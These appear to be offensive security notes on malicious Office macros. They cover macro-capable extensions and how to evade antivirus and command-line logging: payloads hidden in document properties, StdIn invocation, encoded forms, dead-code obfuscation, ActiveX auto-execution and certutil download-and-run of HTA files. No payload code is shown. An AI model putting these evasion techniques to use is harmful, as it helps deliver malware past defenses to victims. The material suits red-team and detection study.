Macro

OfficeOpenXML

OfficeOpenXML Standard file extensions:

• Macros not permitted

  • DOCX

  • DOTX [Template]

• Macros permitted:

  • DOCM

  • DOTM [Template]

DOCM(and other extensions that support macros) files containing macros can be renamed to other formats such as RTF[which do not support macros by design], and still keep their macro executing capabilities.

#List files associated with Office programs and find extensions able to execute macros
assoc | findstr /i "word"
assoc | findstr /i "excel"
assoc | findstr /i "powerp"

Macro leveraging file properties to hide its payload and StdIn to avoid logging

AutoOpen is picked up by some AVs and therefore more creative ways should be employed for macro execution, such as triggering the macro from a button.

Powershell based payloads are added in the document's properties, such as "Author".

Hide Powershell command's arguments from commandline logging via invocation with StdIn.WriteLine

Hide payload in custom excel forms in an encoded form.

Macro Code: Link

Including unused code is a simple obfuscation tactic. In the above example variable c is not used anywhere in the macro.

Leveragin ActiveX Controls for automatic macro execution

....

Download and Run from Disk

Download certutil encoded .crt file and decode to HTA and execute.